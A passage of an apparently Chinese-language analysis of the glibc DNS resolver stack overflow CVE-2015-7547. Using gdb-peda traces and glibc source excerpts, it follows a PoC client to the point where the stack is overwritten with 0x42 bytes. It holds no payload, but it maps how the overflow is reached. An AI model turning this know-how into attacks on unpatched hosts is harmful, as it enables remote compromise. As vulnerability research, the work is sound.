()\r\n```\r\n\r\n\u6574\u4e2a\u8fc7\u7a0b\u8c03\u7528\u975e\u5e38\u6e05\u6670\uff0c#3\u4f4d\u7f6e\u5728\u4e3b\u51fd\u6570\u91cc\uff0c\u7d27\u63a5\u7740#2\u8c03\u7528\u4e86\u6211\u4eec\u7684\u6f0f\u6d1e\u51fd\u6570getaddrinfo\uff0c\u8c03\u7528\u540e\u67d0\u4e2a\u4f4d\u7f6e\u6211\u4eec\u8c03\u7528\u4e86nss_dns_gethostbyname4_r\u51fd\u6570\uff0c\u5728\u5230\u8fbe\u6b64\u51fd\u6570\u65f6\uff0c\u6211\u4eec\u5728poc\u7aef\u8fdb\u884c\u89c2\u5bdf\uff0c\u53d1\u73b0poc\u5e76\u6ca1\u6709\u53d1\u9001\u7578\u5f62\u5b57\u7b26\u4e32\uff0c\u5728\u6b64\u51fd\u6570\u5165\u53e3\uff0c\u6211\u4eec\u901a\u8fc7\u53c2\u6570\u89c2\u5bdf\uff0c\u4e5f\u6ca1\u6709\u770b\u5230\u6709\u7578\u5f62\u5b57\u7b26\u4e32\u52a0\u8f7d\u8fdb\u6765\u3002\r\n\r\n\u8fd9\u4e00\u70b9\u8bf4\u660e\u5728getaddrinfo\u51fd\u6570\u5230nss_dns_gethostbyname\u4e4b\u95f4\u6ca1\u6709\u6d89\u53ca\u5230\u7578\u5f62\u5b57\u7b26\u4e32\u83b7\u53d6\uff0c\u4e5f\u5c31\u662f\u8bf4\u548c\u6f0f\u6d1e\u65e0\u5173\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u8df3\u8fc7\u8fd9\u6bb5\u8c03\u8bd5\uff0c\u76f4\u63a5\u4ece_nss_gethostbyname4_r\u5165\u624b\u7ee7\u7eed\u5bfb\u627e\u3002\r\n\r\n\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u901a\u8fc7\u6700\u5f00\u59cb\u7684bt\u5806\u6808\u8c03\u7528\uff0c\u5bf9\u540e\u9762\u51e0\u4e2a\u51fd\u6570\u8fdb\u884c\u5206\u6790\uff0c\u5982\u679c\u60f3\u5728\u4e4b\u540e\u7684\u8c03\u7528\u4f4d\u7f6e\u4e0b\u65ad\u70b9\uff0c\u9700\u8981\u7ee7\u7eed\u5bf9libresolv.so.2\u7684\u52a0\u8f7d\u8fdb\u884c\u8ddf\u8e2a\uff0c\u90a3\u4e48\u63a5\u4e0b\u6765\uff0c\u4e3a\u4e86\u80fd\u591f\u5feb\u901f\u5b9a\u4f4d\uff0c\u6211\u4eec\u5c31\u5229\u7528\u6700\u5f00\u59cb\u56de\u6eaf\u5806\u6808\u8c03\u7528\u7ed9\u4e88\u7684\u4fe1\u606f\uff0c\u5bf9#0\uff0c#1\uff0c#2\u4e09\u5904\u4e0b\u65ad\u70b9\uff0c\u9996\u5148\u5229\u7528catch load libresolv.so.2\u5bf9\u52a8\u6001\u94fe\u63a5\u5e93\u4e0b\u65ad\u70b9\uff0c\u4e2d\u65ad\u540e\uff0c\u6211\u4eec\u9996\u5148\u6765\u5230\u7b2c\u4e00\u4e2a#2\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ b __libc_res_nsearch\r\nBreakpoint 4 at 0xb7df5240: file res_query.c, line 342.\r\ngdb-peda$ run\r\nStarting program: /opt/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xffffffb8 \r\nEBX: 0xb7e0d000 --> 0x5ec8 \r\nECX: 0xbfffe200 --> 0x0 \r\nEDX: 0x0 \r\nESI: 0xb7e35940 (0xb7e35940)\r\nEDI: 0x8048653 (\"foo.bar.google.com\")\r\nEBP: 0xbfffea68 --> 0xbfffefa8 --> 0xbffff0d8 --> 0xbffff128 --> 0x0 \r\nESP: 0xbfffe1cc --> 0xb7e09590 (<_nss_dns_gethostbyname4_r+192>:\tadd esp,0x30)\r\nEIP: 0xb7df5240 (<__GI___libc_res_nsearch>:\tpush ebp)\r\nEFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df5238 <__GI___res_hostalias+440>:\tret \r\n 0xb7df5239 <__GI___res_hostalias+441>:\t\r\n call 0xb7dfca50 <__stack_chk_fail_local>\r\n 0xb7df523e:\txchg ax,ax\r\n=> 0xb7df5240 <__GI___libc_res_nsearch>:\tpush ebp\r\n 0xb7df5241 <__GI___libc_res_nsearch+1>:\tpush edi\r\n 0xb7df5242 <__GI___libc_res_nsearch+2>:\tpush esi\r\n 0xb7df5243 <__GI___libc_res_nsearch+3>:\tpush ebx\r\n 0xb7df5244 <__GI___libc_res_nsearch+4>:\t\r\n call 0xb7df06e0 <__x86.get_pc_thunk.bx>\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 4, __GI___libc_res_nsearch (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe200 \"\", anslen=0x800, answerp=0xbfffea2c, \r\n answerp2=0xbfffea30, nanswerp2=0xbfffea34, resplen2=0xbfffea38, \r\n answerp2_malloced=0xbfffea3c) at res_query.c:342\r\n342\tres_query.c: No such file or directory.\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u51fd\u6570\u8c03\u7528\u65f6\uff0c\u8fd8\u662f\u6211\u4eec\u7a0b\u5e8f\u5bf9\u5e94\u7684\u5730\u5740\u5185\u5bb9\uff0c\u90a3\u4e48\u63a5\u4e0b\u6765\uff0c\u5230\u8fbe#1\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ b __libc_res_nquerydomain\r\nBreakpoint 5 at 0xb7df4eb0: file res_query.c, line 563.\r\ngdb-peda$ run\r\nStarting program: /opt/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xb7fd6340 --> 0x5 \r\nEBX: 0xb7e04000 --> 0x14ed4 \r\nECX: 0xbfffea2c --> 0xbfffe200 --> 0x0 \r\nEDX: 0x8048653 (\"foo.bar.google.com\")\r\nESI: 0x3 \r\nEDI: 0xb7fd6340 --> 0x5 \r\nEBP: 0xbfffea30 --> 0x0 \r\nESP: 0xbfffdd2c --> 0xb7df54cb (<__GI___libc_res_nsearch+651>:\tadd esp,0x30)\r\nEIP: 0xb7df4eb0 (<__libc_res_nquerydomain>:\tpush ebp)\r\nEFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df4ea4 <__GI___libc_res_nquery+1716>:\tpush eax\r\n 0xb7df4ea5 <__GI___libc_res_nquery+1717>:\t\r\n call 0xb7df0680 <__assert_fail@plt>\r\n 0xb7df4eaa:\tlea esi,[esi+0x0]\r\n=> 0xb7df4eb0 <__libc_res_nquerydomain>:\tpush ebp\r\n 0xb7df4eb1 <__libc_res_nquerydomain+1>:\tpush edi\r\n 0xb7df4eb2 <__libc_res_nquerydomain+2>:\tmov edi,eax\r\n 0xb7df4eb4 <__libc_res_nquerydomain+4>:\tpush esi\r\n 0xb7df4eb5 <__libc_res_nquerydomain+5>:\tpush ebx\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 5, __libc_res_nquerydomain (\r\n statp=statp@entry=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=name@entry=0x8048653 \"foo.bar.google.com\", domain=0x0, class=0x1, \r\n type=0xf371, answer=0xbfffe200 \"\", anslen=0x800, answerp=0xbfffea2c, \r\n answerp2=0xbfffea30, nanswerp2=0xbfffea34, resplen2=0xbfffea38, \r\n answerp2_malloced=0xbfffea3c) at res_query.c:563\r\n563\tres_query.c: No such file or directory.\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u65f6\u8fd8\u662f\u6b63\u5e38\uff0c\u63a5\u4e0b\u6765\u6765\u5230#0\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ b __libc_res_nquery\r\nBreakpoint 6 at 0xb7df47f0: file res_query.c, line 124.\r\ngdb-peda$ run\r\nStarting program: /opt/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x11 \r\nEBX: 0xb7e04000 --> 0x14ed4 \r\nECX: 0x13 \r\nEDX: 0x5 \r\nESI: 0x8048653 (\"foo.bar.google.com\")\r\nEDI: 0xb7fd6340 --> 0x5 \r\nEBP: 0x0 \r\nESP: 0xbfffd8ac --> 0xb7df4fa1 (<__libc_res_nquerydomain+241>:\tadd esp,0x30)\r\nEIP: 0xb7df47f0 (<__GI___libc_res_nquery>:\tpush ebp)\r\nEFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df47eb:\txchg ax,ax\r\n 0xb7df47ed:\txchg ax,ax\r\n 0xb7df47ef:\tnop\r\n=> 0xb7df47f0 <__GI___libc_res_nquery>:\tpush ebp\r\n 0xb7df47f1 <__GI___libc_res_nquery+1>:\tmov edx,0x220\r\n 0xb7df47f6 <__GI___libc_res_nquery+6>:\tmov ebp,esp\r\n 0xb7df47f8 <__GI___libc_res_nquery+8>:\tpush edi\r\n 0xb7df47f9 <__GI___libc_res_nquery+9>:\tpush esi\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 6, __GI___libc_res_nquery (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe200 \"\", anslen=0x800, answerp=0xbfffea2c, \r\n answerp2=0xbfffea30, nanswerp2=0xbfffea34, resplen2=0xbfffea38, \r\n answerp2_malloced=0xbfffea3c) at res_query.c:124\r\n124\tres_query.c: No such file or directory.\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\u6b64\u65f6\u4f9d\u7136\u6b63\u5e38\uff0c\u8fd9\u8bf4\u660e\u6f0f\u6d1e\u4f4d\u7f6e\u5c31\u51fa\u73b0\u5728libc_res_nquery\u51fd\u6570\u4e2d\uff0c\u90a3\u4e48\u6211\u4eec\u63a5\u4e0b\u6765\uff0c\u5728\u5bf9\u6b64\u51fd\u6570\u8fdb\u884c\u8ddf\u8e2a\u5206\u6790\u4e4b\u524d\uff0c\u6211\u4eec\u6765\u901a\u8fc7\u6e90\u7801\u6765\u603b\u7ed3\u4e00\u4e0b\u4e4b\u524d\u7684\u8c03\u7528\u8fc7\u7a0b\u3002\r\n\r\n```\r\n_nss_dns_gethostbyname4_r (const char *name, struct gaih_addrtuple **pat,\r\n\t\t\t char *buffer, size_t buflen, int *errnop,\r\n\t\t\t int *herrnop, int32_t *ttlp)\r\n{\r\n \u2026\u2026\r\n//\u7701\u7565\u8fc7\u7a0b\r\n \u2026\u2026\r\n host_buffer.buf = orig_host_buffer = (querybuf *) alloca (2048);//\u5f00\u8f9f2048\u7a7a\u95f4\uff0c\u91cd\u8981\uff01\r\n u_char *ans2p = NULL;\r\n int nans2p = 0;\r\n int resplen2 = 0;\r\n int ans2p_malloced = 0;\r\n\r\n int olderr = errno;\r\n enum nss_status status;\r\n //\u8c03\u7528__libc_res_nsearch\r\n int n = __libc_res_nsearch (&_res, name, C_IN, T_UNSPEC,\r\n\t\t\t host_buffer.buf->buf, 2048, &host_buffer.ptr,\r\n\t\t\t &ans2p, &nans2p, &resplen2, &ans2p_malloced);\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u4e3ahost_buffer\u4f5c\u4e3aquerybuf\u5f00\u8f9f\u4e862048\u5b57\u8282\u7684\u7f13\u51b2\u533a\uff0c\u8fd9\u4e5f\u662f\u540e\u9762\u6f0f\u6d1e\u5728res_nquery\u5f62\u6210\u7684\u5173\u952e\u70b9\u3002\u6211\u5c06\u51e0\u6b21\u51fd\u6570\u8c03\u7528\u5199\u5728\u4e00\u8d77\uff0c\u7701\u7565\u4e86\u90e8\u5206\u8fc7\u7a0b\uff08\u6bd5\u7adf\u4e0d\u91cd\u8981\uff09\uff0c\u8fd9\u91cc\u6211\u4eec\u8fd8\u89c2\u5bdf\u4e00\u4e0blibc_res_nsearch\u8c03\u7528\u7684\u7b2c\u4e94\u4e2a\u53c2\u6570\uff0c\u4e5f\u5c31\u662f2048\u7a7a\u95f4\u5bf9\u5e94\u7684\u5730\u5740\u4f4d\u7f6e\uff0c\u63a5\u4e0b\u6765\u3002\r\n\r\n```\r\nint\r\n__libc_res_nsearch(res_state statp,\r\n\t\t const char *name,\t/* domain name */\r\n\t\t int class, int type,\t/* class and type of query */\r\n\t\t u_char *answer,\t/* buffer to put answer */\r\n\t\t int anslen,\t\t/* size of answer */\r\n\t\t u_char **answerp,\r\n\t\t u_char **answerp2,\r\n\t\t int *nanswerp2,\r\n\t\t int *resplen2,\r\n\t\t int *answerp2_malloced)\r\n{\r\n\t\u2026\u2026\r\n\u7701\u7565\u8fc7\u7a0b\r\n\u2026\u2026\r\n//\u8c03\u7528_libc_res_nquerydomain\r\n\t\tret = __libc_res_nquerydomain(statp, name, NULL, class, type, \r\n\t\t\t\t\t answer, anslen, answerp,\r\n\t\t\t\t\t answerp2, nanswerp2, resplen2,\r\n\t\t\t\t\t answerp2_malloced);\r\n```\r\n\r\n\u8fd8\u8bb0\u5f97\u521a\u624d\u6211\u4eec\u63d0\u5230\u7684\u7b2c\u4e94\u4e2a\u53c2\u6570\u5417\uff0c\u5c31\u662f\u73b0\u5728\u7684*answerp\uff0c\u7d27\u63a5\u7740\u7ee7\u7eed\u8c03\u7528\u5230\u6700\u540e\u7684\u5904\u7406\u51fd\u6570\u3002\r\n\r\n```\r\nstatic int\r\n__libc_res_nquerydomain(res_state statp,\r\n\t\t\tconst char *name,\r\n\t\t\tconst char *domain,\r\n\t\t\tint class, int type,\t/* class and type of query */\r\n\t\t\tu_char *answer,\t\t/* buffer to put answer */\r\n\t\t\tint anslen,\t\t\t/* size of answer */\r\n\t\t\tu_char **answerp,\r\n\t\t\tu_char **answerp2,\r\n\t\t\tint *nanswerp2,\r\n\t\t\tint *resplen2,\r\n\t\t\tint *answerp2_malloced)\r\n{\r\n\t\u2026\u2026\r\n\u7701\u7565\u8fc7\u7a0b\r\n\u2026\u2026\r\n//\u8c03\u7528libc_res_nquery\r\n\treturn (__libc_res_nquery(statp, longname, class, type, answer,\r\n\t\t\t\t anslen, answerp, answerp2, nanswerp2,\r\n\t\t\t\t resplen2, answerp2_malloced));\r\n}\r\n```\r\n\r\n\u8fd8\u662fanswer\u53d8\u91cf\u503c\u5f97\u5173\u6ce8\uff0c\u63a5\u4e0b\u6765\u7684\u5206\u6790\u4e2d\u4f1a\u63d0\u5230\u8fd9\u4e00\u70b9\uff0c\u8fd9\u4e2aanswer\u51fd\u6570\u5bf9\u5e94\u7684\u4f4d\u7f6e\u5c31\u662f\u5df2\u7ecf\u5206\u914d\u76842048\u7a7a\u95f4\uff0c\u800c\u5728\u51fd\u6570\u8fdb\u884cread\u64cd\u4f5c\u65f6\uff0c\u5e76\u6ca1\u6709\u5bf9DNS\u8fd4\u56de\u7684\u5b57\u7b26\u4e32\u7578\u5f62\u68c0\u67e5\uff0c\u800c\u76f4\u63a5\u62f7\u8d1d\u5b57\u7b26\u4e32\u4e86\u5230\u6570\u7ec4\u7a7a\u95f4\u4e86\uff01\r\n\r\n\u90a3\u4e48\u8fdb\u5165\u5230res_nquery\u4e4b\u540e\uff0c\u6211\u4eec\u9700\u8981\u5bf9\u8fd9\u4e2a\u51fd\u6570\u8fdb\u884c\u5355\u6b65\u8ddf\u8e2a\u5206\u6790\uff0c\u56e0\u4e3a\u4e00\u76f4\u5230\u8fd9\u4e2a\u51fd\u6570\u524d\uff0cPoC\u7aef\u90fd\u6ca1\u6709\u53cd\u5e94\uff0c\u53ef\u89c1\u6b64\u65f6\u8fd8\u662f\u5728\u672c\u673a\u8fdb\u884c\u4e86\u4e00\u4e9b\u8bfb\u53d6\u64cd\u4f5c\uff0c\u540e\u9762\u67e5\u8be2\u64cd\u4f5c\u65f6\uff0c\u624d\u6d89\u53ca\u5230\u548cDNS\u4ea4\u4e92\u3002\u5355\u6b65\u8ddf\u8e2a\uff0c\u5728\u67d0\u51fd\u6570\u4f4d\u7f6e\u53d1\u73b0\u4e86\u95ee\u9898\u3002\r\n\r\n```\r\ngdb-peda$ run\r\nStarting program: /root/Desktop/CVE-2015-7547-master/CVE-2015-7547-master/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x804c728 --> 0x35000002 \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0x0 \r\nEDX: 0xb7fd6340 --> 0x5 \r\nESI: 0x0 \r\nEDI: 0xb7fd6514 --> 0xffffffff \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd5d0 --> 0xbfffd764 --> 0x1006d \r\nEIP: 0xb7df3702 (<__libc_res_nsend+354>:\tmov eax,DWORD PTR [esp+0x158])\r\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df36f6 <__libc_res_nsend+342>:\tmov esi,DWORD PTR [esp+0x1c]\r\n 0xb7df36fa <__libc_res_nsend+346>:\ttest esi,esi\r\n 0xb7df36fc <__libc_res_nsend+348>:\t\r\n jne 0xb7df4145 <__libc_res_nsend+2981>\r\n=> 0xb7df3702 <__libc_res_nsend+354>:\tmov eax,DWORD PTR [esp+0x158]\r\n 0xb7df3709 <__libc_res_nsend+361>:\tmov esi,DWORD PTR [ebp+0x0]\r\n 0xb7df370c <__libc_res_nsend+364>:\tmov DWORD PTR [esp+0x9c],0x0\r\n 0xb7df3717 <__libc_res_nsend+375>:\tmov DWORD PTR [esp+0x74],eax\r\n 0xb7df371b <__libc_res_nsend+379>:\tmov eax,DWORD PTR [esp+0x4]\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, __libc_res_nsend (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"\\362 \\001\", buflen=0x24, buf2=0xbfffd764 \"m\", \r\n buflen2=0x24, ans=0xbfffe340 \"\", anssiz=0x800, ansp=0xbfffeb6c, \r\n ansp2=0xbfffeb70, nansp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n ansp2_malloced=0xbfffeb7c) at res_send.c:564\r\n564\tres_send.c: No such file or directory.\r\n```\r\n\r\n\u6211\u4eec\u8fdb\u5165\u5230\u4e00\u5904res_nsend\u51fd\u6570\uff0c\u5728\u8fdb\u5165\u524d\u4e00\u5207\u8fd8\u6b63\u5e38\uff0c\u6211\u4eec\u76f4\u63a5\u901a\u8fc7finish\u6765\u6267\u884c\u5230\u51fd\u6570\u8fd4\u56de\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ finish\r\nRun till exit from #0 __libc_res_nsend (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"\\362 \\001\", buflen=0x24, buf2=0xbfffd764 \"m\", \r\n buflen2=0x24, ans=0xbfffe340 \"\", anssiz=0x800, ansp=0xbfffeb6c, \r\n ansp2=0xbfffeb70, nansp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n ansp2_malloced=0xbfffeb7c) at res_send.c:564\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbcc \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0x1 \r\nEDX: 0xffffffff \r\nESI: 0xb7fd6340 --> 0x5 \r\nEDI: 0xbfffe340 --> 0x4242006d ('m')\r\nEBP: 0xbfffd9e8 --> 0x0 \r\nESP: 0xbfffd710 --> 0xb7fd6340 --> 0x5 \r\nEIP: 0xb7df191b (<__GI___libc_res_nquery+299>:\tmov DWORD PTR [ebp-0x30],eax)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df1912 <__GI___libc_res_nquery+290>:\tpush DWORD PTR [ebp-0x30]\r\n 0xb7df1915 <__GI___libc_res_nquery+293>:\tpush esi\r\n 0xb7df1916 <__GI___libc_res_nquery+294>:\t\r\n call 0xb7df35a0 <__libc_res_nsend>\r\n=> 0xb7df191b <__GI___libc_res_nquery+299>:\tmov DWORD PTR [ebp-0x30],eax\r\n 0xb7df191e <__GI___libc_res_nquery+302>:\tmov eax,DWORD PTR [ebp-0x40]\r\n 0xb7df1921 <__GI___libc_res_nquery+305>:\tadd esp,0x30\r\n 0xb7df1924 <__GI___libc_res_nquery+308>:\ttest eax,eax\r\n 0xb7df1926 <__GI___libc_res_nquery+310>:\t\r\n jne 0xb7df1b50 <__GI___libc_res_nquery+864>\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd710 --> 0xb7fd6340 --> 0x5 \r\n0004| 0xbfffd714 --> 0xbfffd740 --> 0x120f2 \r\n0008| 0xbfffd718 --> 0x24 ('$')\r\n0012| 0xbfffd71c --> 0xbfffd764 --> 0x1006d \r\n0016| 0xbfffd720 --> 0x24 ('$')\r\n0020| 0xbfffd724 --> 0xbfffe340 --> 0x4242006d ('m')\r\n0024| 0xbfffd728 --> 0x10000 \r\n0028| 0xbfffd72c --> 0xbfffeb6c ('B' <repeats 200 times>...)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n0xb7df191b in __GI___libc_res_nquery (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe340 \"m\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at res_query.c:227\r\n227\tres_query.c: No such file or directory.\r\n```\r\n\r\n\r\n\u5728\u4ee3\u7801\u533a\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u73b0\u5728\u6240\u5904\u7684\u4f4d\u7f6e\u662f0xb7df191b\u7684\u4f4d\u7f6e\uff0c\u800c\u5728\u8fd9\u4e2a\u4f4d\u7f6e\u4e0a\u9762\u7684\u5730\u5740\uff0c\u6267\u884c\u4e86call __libc_res_nsend\u51fd\u6570\uff0c\u5f53\u51fd\u6570\u8fd4\u56de\u540e\uff0c\u6211\u4eec\u53d1\u73b0\u5728\u6808\u4e2dbfffeb6c\u7684\u4f4d\u7f6e\uff0c\u51fa\u73b0\u4e86\u6211\u4eec\u7684\u7578\u5f62\u5b57\u7b26\u4e32B\uff0c\u800cPoC\u7aef\u6b64\u65f6\u4e5f\u6267\u884c\u4e86\u53d1\u9001\u64cd\u4f5c\u3002\u6211\u4eec\u6765\u770b\u4e00\u4e0bbfffeb6c\u6b64\u65f6\u7684\u503c\u3002\r\n\r\n```\r\n0xbfffeb9c:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffeba4:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebac:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebb4:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebbc:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebc4:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebcc:\t0x42\t0x42\t0x42\t0x42\r\n```\r\n\r\n\u5df2\u7ecf\u8986\u76d6\u4e86\u5927\u91cf\u768442424242\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u5b9a\u4f4d\u51fa\u73b0\u95ee\u9898\u7684\u5730\u65b9\u5728__libc_res_nsend\u4e2d\u3002\u5728res_query.c\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230res_nquery\u51fd\u6570\u5bf9res_nsend\u7684\u8c03\u7528\u3002\u800c\u4e14\u4e5f\u53ea\u6709\u8fd9\u4e00\u5904\u8c03\u7528\u4e86res_nsend\u3002\r\n\r\n```\r\nint\r\n__libc_res_nquery(res_state statp,\r\n\t\t const char *name,\t/* domain name */\r\n\t\t int class, int type,\t/* class and type of query */\r\n\t\t u_char *answer,\t/* buffer to put answer */\r\n\t\t int anslen,\t\t/* size of answer buffer */\r\n\t\t u_char **answerp,\t/* if buffer needs to be enlarged */\r\n\t\t u_char **answerp2,\r\n\t\t int *nanswerp2,\r\n\t\t int *resplen2,\r\n\t\t int *answerp2_malloced)\r\n{\r\n\tHEADER *hp = (HEADER *) answer;\r\n\tHEADER *hp2;\r\n\tint n, use_malloc = 0;\r\n\tu_int oflags = statp->_flags;\r\n\u2026\u2026\r\n\u7701\u7565\u8fc7\u7a0b\r\n\u2026\u2026\r\n\tassert (answerp == NULL || (void *) *answerp == (void *) answer);\r\n//\u6f0f\u6d1e\u89e6\u53d1\u51fd\u6570\r\n\tn = __libc_res_nsend(statp, query1, nquery1, query2, nquery2, answer,\r\n\t\t\t anslen, answerp, answerp2, nanswerp2, resplen2,\r\n\t\t\t answerp2_malloced);\r\n\tif (use_malloc)\r\n\t\tfree (buf);\r\n```\r\n\r\n\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u8981\u7740\u91cd\u5173\u6ce8\u4e00\u4e0blibc_res_nsend\u51fd\u6570\uff0c\u9996\u5148\u6211\u4eec\u8ddf\u8e2a\u8c03\u8bd5\u65f6\u53d1\u73b0\u7a0b\u5e8f\u4f1a\u8fdb\u5165\u4e00\u5904if\u8bed\u53e5\u5224\u65ad\uff0c\u8fdb\u5165send_vc\u548csend_dg\u51fd\u6570\uff0c\u5728send_vc\u51fd\u6570\u4e2d\u53d1\u73b0\u4e86socket\u548cconnect\u8fde\u63a5\u8bed\u53e5\uff0c\u5728\u8fde\u63a5\u8bed\u53e5\u6267\u884c\u7ed3\u675f\u65f6\uff0cpoc\u7aef\u63d0\u793aconnect 127.0.0.1\uff0c\u4e5f\u5c31\u662f\u6267\u884c\u4e86\u8fde\u63a5\u64cd\u4f5c\u3002\r\n\r\n```\r\ngdb-peda$ n\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x3 \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0xbfffd2e0 --> 0x2 \r\nEDX: 0xb7e01000 --> 0x14ed4 \r\nESI: 0xbfffeb78 --> 0x0 \r\nEDI: 0xb7fd6514 --> 0xffffffff \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd2e0 --> 0x2 \r\nEIP: 0xb7df2b64 (<send_vc+244>:\tadd esp,0x10)\r\nEFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df2b5b <send_vc+235>:\tmovzx eax,WORD PTR [eax]\r\n 0xb7df2b5e <send_vc+238>:\tpush eax\r\n 0xb7df2b5f <send_vc+239>:\tcall 0xb7ded620 <socket@plt>\r\n=> 0xb7df2b64 <send_vc+244>:\tadd esp,0x10\r\n 0xb7df2b67 <send_vc+247>:\ttest eax,eax\r\n 0xb7df2b69 <send_vc+249>:\tmov DWORD PTR [ebp+0x1c4],eax\r\n 0xb7df2b6f <send_vc+255>:\tjs 0xb7df312a <send_vc+1722>\r\n 0xb7df2b75 <send_vc+261>:\tmov edi,DWORD PTR [esp+0x48]\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd2e0 --> 0x2 \r\n0004| 0xbfffd2e4 --> 0x1 \r\n0008| 0xbfffd2e8 --> 0x0 \r\n0012| 0xbfffd2ec --> 0xb7e433e8 --> 0x72647800 ('')\r\n0016| 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\n0020| 0xbfffd2f4 --> 0xbfffeb74 --> 0x0 \r\n0024| 0xbfffd2f8 --> 0xbfffeb6c --> 0x804c748 --> 0x8083ab32 \r\n0028| 0xbfffd2fc --> 0xbfffd728 --> 0x10000 \r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n725\tin res_send.c\r\n\r\nBreakpoint 2, send_vc (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"B6\\001\", buflen=0x24, buf2=0xbfffd764 \"\\t\\374\\001\", \r\n buflen2=0x24, ansp=0xbfffd65c, anssizp=0xbfffd728, terrno=0xbfffd668, \r\n ns=0x0, anscp=0xbfffeb6c, ansp2=0xbfffeb70, anssizp2=0xbfffeb74, \r\n resplen2=0xbfffeb78, ansp2_malloced=0xbfffeb7c) at res_send.c:669\r\n669\tres_send.c: No such file or 